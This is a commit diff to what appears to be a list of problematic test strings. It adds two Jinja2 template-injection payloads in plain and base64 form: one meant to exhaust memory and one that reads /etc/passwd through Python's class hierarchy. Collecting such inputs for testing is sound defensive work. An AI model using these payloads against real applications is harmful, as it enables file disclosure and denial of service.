added jinja2 injections

2020-05-18 22:42:34 +03:00 · 2020-05-18 22:42:34 +03:00 · 0d5fd11f90
parent 9c25300f66
commit 0d5fd11f90
4 changed files with 24 additions and 2 deletions
--- a/blns.base64.json
+++ b/blns.base64.json
@ -671,6 +671,9 @@
  "VGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBd", 
  "UG93ZXLZhNmP2YTZj9i12ZHYqNmP2YTZj9mE2LXZkdio2Y/Ysdix2Ysg4KWjIOClo2gg4KWjIOCl", 
  "o+WGlw==", 
-  "2q/ahtm+2pg="
+  "2q/ahtm+2pg=",
+  "eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9",
+  "e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFz",
+  "c3dkIikucmVhZCgpIH19"
 ]

--- a/blns.base64.txt
+++ b/blns.base64.txt
@ -899,3 +899,12 @@ o+WGlw==
 # This is a four characters string which includes Persian special characters (گچپژ)

 2q/ahtm+2pg=
+
+# jinja2 injection
+#
+# first one is supposed to raise "MemoryError" exception
+# second, obviously, prints contents of /etc/passwd
+
+eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9
+e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFz
+c3dkIikucmVhZCgpIH19
--- a/blns.json
+++ b/blns.json
@ -510,5 +510,7 @@
  "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗", 
  "🏳0🌈️",
  "జ్ఞ‌ా",
-  "گچپژ"
+  "گچپژ",
+  "{% print 'x' * 64 * 1024**3 %}",
+  "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}"
 ]
--- a/blns.txt
+++ b/blns.txt
@ -731,3 +731,11 @@ Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
 # This is a four characters string which includes Persian special characters (گچپژ)

 گچپژ
+
+# jinja2 injection
+#
+# first one is supposed to raise "MemoryError" exception
+# second, obviously, prints contents of /etc/passwd
+
+{% print 'x' * 64 * 1024**3 %}
+{{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}